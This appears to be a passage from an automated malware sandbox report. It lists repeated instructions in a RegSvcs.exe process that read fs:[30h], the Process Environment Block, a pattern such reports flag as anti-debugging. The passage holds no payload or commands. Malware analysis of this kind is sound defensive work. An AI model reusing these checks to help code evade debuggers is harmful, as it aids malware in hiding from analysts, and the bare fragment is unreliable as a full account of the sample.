          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D43D4 mov eax, dword ptr fs:[00000030h]5_2_014D43D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014403E9 mov eax, dword ptr fs:[00000030h]5_2_014403E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014403E9 mov eax, dword ptr fs:[00000030h]5_2_014403E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014403E9 mov eax, dword ptr fs:[00000030h]5_2_014403E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014403E9 mov eax, dword ptr fs:[00000030h]5_2_014403E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014403E9 mov eax, dword ptr fs:[00000030h]5_2_014403E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014403E9 mov eax, dword ptr fs:[00000030h]5_2_014403E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014403E9 mov eax, dword ptr fs:[00000030h]5_2_014403E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014403E9 mov eax, dword ptr fs:[00000030h]5_2_014403E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144E3F0 mov eax, dword ptr fs:[00000030h]5_2_0144E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144E3F0 mov eax, dword ptr fs:[00000030h]5_2_0144E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144E3F0 mov eax, dword ptr fs:[00000030h]5_2_0144E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014663FF mov eax, dword ptr fs:[00000030h]5_2_014663FF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142E388 mov eax, dword ptr fs:[00000030h]5_2_0142E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142E388 mov eax, dword ptr fs:[00000030h]5_2_0142E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142E388 mov eax, dword ptr fs:[00000030h]5_2_0142E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145438F mov eax, dword ptr fs:[00000030h]5_2_0145438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145438F mov eax, dword ptr fs:[00000030h]5_2_0145438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01428397 mov eax, dword ptr fs:[00000030h]5_2_01428397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01428397 mov eax, dword ptr fs:[00000030h]5_2_01428397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01428397 mov eax, dword ptr fs:[00000030h]5_2_01428397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B8243 mov eax, dword ptr fs:[00000030h]5_2_014B8243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B8243 mov ecx, dword ptr fs:[00000030h]5_2_014B8243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0150625D mov eax, dword ptr fs:[00000030h]5_2_0150625D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142A250 mov eax, dword ptr fs:[00000030h]5_2_0142A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01436259 mov eax, dword ptr fs:[00000030h]5_2_01436259
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EA250 mov eax, dword ptr fs:[00000030h]5_2_014EA250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EA250 mov eax, dword ptr fs:[00000030h]5_2_014EA250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01434260 mov eax, dword ptr fs:[00000030h]5_2_01434260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01434260 mov eax, dword ptr fs:[00000030h]5_2_01434260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01434260 mov eax, dword ptr fs:[00000030h]5_2_01434260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142826B mov eax, dword ptr fs:[00000030h]5_2_0142826B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142823B mov eax, dword ptr fs:[00000030h]5_2_0142823B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A2C3 mov eax, dword ptr fs:[00000030h]5_2_0143A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A2C3 mov eax, dword ptr fs:[00000030h]5_2_0143A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A2C3 mov eax, dword ptr fs:[00000030h]5_2_0143A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A2C3 mov eax, dword ptr fs:[00000030h]5_2_0143A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A2C3 mov eax, dword ptr fs:[00000030h]5_2_0143A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_015062D6 mov eax, dword ptr fs:[00000030h]5_2_015062D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014402E1 mov eax, dword ptr fs:[00000030h]5_2_014402E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014402E1 mov eax, dword ptr fs:[00000030h]5_2_014402E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014402E1 mov eax, dword ptr fs:[00000030h]5_2_014402E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E284 mov eax, dword ptr fs:[00000030h]5_2_0146E284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E284 mov eax, dword ptr fs:[00000030h]5_2_0146E284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B0283 mov eax, dword ptr fs:[00000030h]5_2_014B0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B0283 mov eax, dword ptr fs:[00000030h]5_2_014B0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B0283 mov eax, dword ptr fs:[00000030h]5_2_014B0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014402A0 mov eax, dword ptr fs:[00000030h]5_2_014402A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014402A0 mov eax, dword ptr fs:[00000030h]5_2_014402A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C62A0 mov eax, dword ptr fs:[00000030h]5_2_014C62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C62A0 mov ecx, dword ptr fs:[00000030h]5_2_014C62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C62A0 mov eax, dword ptr fs:[00000030h]5_2_014C62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C62A0 mov eax, dword ptr fs:[00000030h]5_2_014C62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C62A0 mov eax, dword ptr fs:[00000030h]5_2_014C62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C62A0 mov eax, dword ptr fs:[00000030h]5_2_014C62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01438550 mov eax, dword ptr fs:[00000030h]5_2_01438550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01438550 mov eax, dword ptr fs:[00000030h]5_2_01438550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146656A mov eax, dword ptr fs:[00000030h]5_2_0146656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146656A mov eax, dword ptr fs:[00000030h]5_2_0146656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146656A mov eax, dword ptr fs:[00000030h]5_2_0146656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C6500 mov eax, dword ptr fs:[00000030h]5_2_014C6500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504500 mov eax, dword ptr fs:[00000030h]5_2_01504500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504500 mov eax, dword ptr fs:[00000030h]5_2_01504500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504500 mov eax, dword ptr fs:[00000030h]5_2_01504500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504500 mov eax, dword ptr fs:[00000030h]5_2_01504500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504500 mov eax, dword ptr fs:[00000030h]5_2_01504500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504500 mov eax, dword ptr fs:[00000030h]5_2_01504500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504500 mov eax, dword ptr fs:[00000030h]5_2_01504500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440535 mov eax, dword ptr fs:[00000030h]5_2_01440535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440535 mov eax, dword ptr fs:[00000030h]5_2_01440535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440535 mov eax, dword ptr fs:[00000030h]5_2_01440535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440535 mov eax, dword ptr fs:[00000030h]5_2_01440535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440535 mov eax, dword ptr fs:[00000030h]5_2_01440535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440535 mov eax, dword ptr fs:[00000030h]5_2_01440535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E53E mov eax, dword ptr fs:[00000030h]5_2_0145E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E53E mov eax, dword ptr fs:[00000030h]5_2_0145E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E53E mov eax, dword ptr fs:[00000030h]5_2_0145E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E53E mov eax, dword ptr fs:[00000030h]5_2_0145E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E53E mov eax, dword ptr fs:[00000030h]5_2_0145E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E5CF mov eax, dword ptr fs:[00000030h]5_2_0146E5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E5CF mov eax, dword ptr fs:[00000030h]5_2_0146E5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014365D0 mov eax, dword ptr fs:[00000030h]5_2_014365D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146A5D0 mov eax, dword ptr fs:[00000030h]5_2_0146A5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146A5D0 mov eax, dword ptr fs:[00000030h]5_2_0146A5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E5E7 mov eax, dword ptr fs:[00000030h]5_2_0145E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E5E7 mov eax, dword ptr fs:[00000030h]5_2_0145E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E5E7 mov eax, dword ptr fs:[00000030h]5_2_0145E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E5E7 mov eax, dword ptr fs:[00000030h]5_2_0145E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E5E7 mov eax, dword ptr fs:[00000030h]5_2_0145E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E5E7 mov eax, dword ptr fs:[00000030h]5_2_0145E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E5E7 mov eax, dword ptr fs:[00000030h]5_2_0145E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E5E7 mov eax, dword ptr fs:[00000030h]5_2_0145E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014325E0 mov eax, dword ptr fs:[00000030h]5_2_014325E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146C5ED mov eax, dword ptr fs:[00000030h]5_2_0146C5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146C5ED mov eax, dword ptr fs:[00000030h]5_2_0146C5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01432582 mov eax, dword ptr fs:[00000030h]5_2_01432582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01432582 mov ecx, dword ptr fs:[00000030h]5_2_01432582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01464588 mov eax, dword ptr fs:[00000030h]5_2_01464588
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E59C mov eax, dword ptr fs:[00000030h]5_2_0146E59C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B05A7 mov eax, dword ptr fs:[00000030h]5_2_014B05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B05A7 mov eax, dword ptr fs:[00000030h]5_2_014B05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B05A7 mov eax, dword ptr fs:[00000030h]5_2_014B05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014545B1 mov eax, dword ptr fs:[00000030h]5_2_014545B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014545B1 mov eax, dword ptr fs:[00000030h]5_2_014545B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E443 mov eax, dword ptr fs:[00000030h]5_2_0146E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E443 mov eax, dword ptr fs:[00000030h]5_2_0146E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E443 mov eax, dword ptr fs:[00000030h]5_2_0146E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E443 mov eax, dword ptr fs:[00000030h]5_2_0146E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E443 mov eax, dword ptr fs:[00000030h]5_2_0146E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E443 mov eax, dword ptr fs:[00000030h]5_2_0146E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E443 mov eax, dword ptr fs:[00000030h]5_2_0146E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E443 mov eax, dword ptr fs:[00000030h]5_2_0146E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EA456 mov eax, dword ptr fs:[00000030h]5_2_014EA456
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142645D mov eax, dword ptr fs:[00000030h]5_2_0142645D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145245A mov eax, dword ptr fs:[00000030h]5_2_0145245A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BC460 mov ecx, dword ptr fs:[00000030h]5_2_014BC460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145A470 mov eax, dword ptr fs:[00000030h]5_2_0145A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145A470 mov eax, dword ptr fs:[00000030h]5_2_0145A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145A470 mov eax, dword ptr fs:[00000030h]5_2_0145A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01468402 mov eax, dword ptr fs:[00000030h]5_2_01468402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01468402 mov eax, dword ptr fs:[00000030h]5_2_01468402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01468402 mov eax, dword ptr fs:[00000030h]5_2_01468402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142E420 mov eax, dword ptr fs:[00000030h]5_2_0142E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142E420 mov eax, dword ptr fs:[00000030h]5_2_0142E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142E420 mov eax, dword ptr fs:[00000030h]5_2_0142E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142C427 mov eax, dword ptr fs:[00000030h]5_2_0142C427
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B6420 mov eax, dword ptr fs:[00000030h]5_2_014B6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B6420 mov eax, dword ptr fs:[00000030h]5_2_014B6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B6420 mov eax, dword ptr fs:[00000030h]5_2_014B6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B6420 mov eax, dword ptr fs:[00000030h]5_2_014B6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B6420 mov eax, dword ptr fs:[00000030h]5_2_014B6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B6420 mov eax, dword ptr fs:[00000030h]5_2_014B6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B6420 mov eax, dword ptr fs:[00000030h]5_2_014B6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146A430 mov eax, dword ptr fs:[00000030h]5_2_0146A430
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014304E5 mov ecx, dword ptr fs:[00000030h]5_2_014304E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EA49A mov eax, dword ptr fs:[00000030h]5_2_014EA49A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014364AB mov eax, dword ptr fs:[00000030h]5_2_014364AB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014644B0 mov ecx, dword ptr fs:[00000030h]5_2_014644B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BA4B0 mov eax, dword ptr fs:[00000030h]5_2_014BA4B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146674D mov esi, dword ptr fs:[00000030h]5_2_0146674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146674D mov eax, dword ptr fs:[00000030h]5_2_0146674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146674D mov eax, dword ptr fs:[00000030h]5_2_0146674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01430750 mov eax, dword ptr fs:[00000030h]5_2_01430750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BE75D mov eax, dword ptr fs:[00000030h]5_2_014BE75D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472750 mov eax, dword ptr fs:[00000030h]5_2_01472750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472750 mov eax, dword ptr fs:[00000030h]5_2_01472750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B4755 mov eax, dword ptr fs:[00000030h]5_2_014B4755
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01438770 mov eax, dword ptr fs:[00000030h]5_2_01438770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440770 mov eax, dword ptr fs:[00000030h]5_2_01440770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146C700 mov eax, dword ptr fs:[00000030h]5_2_0146C700
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01430710 mov eax, dword ptr fs:[00000030h]5_2_01430710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01460710 mov eax, dword ptr fs:[00000030h]5_2_01460710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146C720 mov eax, dword ptr fs:[00000030h]5_2_0146C720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146C720 mov eax, dword ptr fs:[00000030h]5_2_0146C720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146273C mov eax, dword ptr fs:[00000030h]5_2_0146273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146273C mov ecx, dword ptr fs:[00000030h]5_2_0146273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146273C mov eax, dword ptr fs:[00000030h]5_2_0146273C
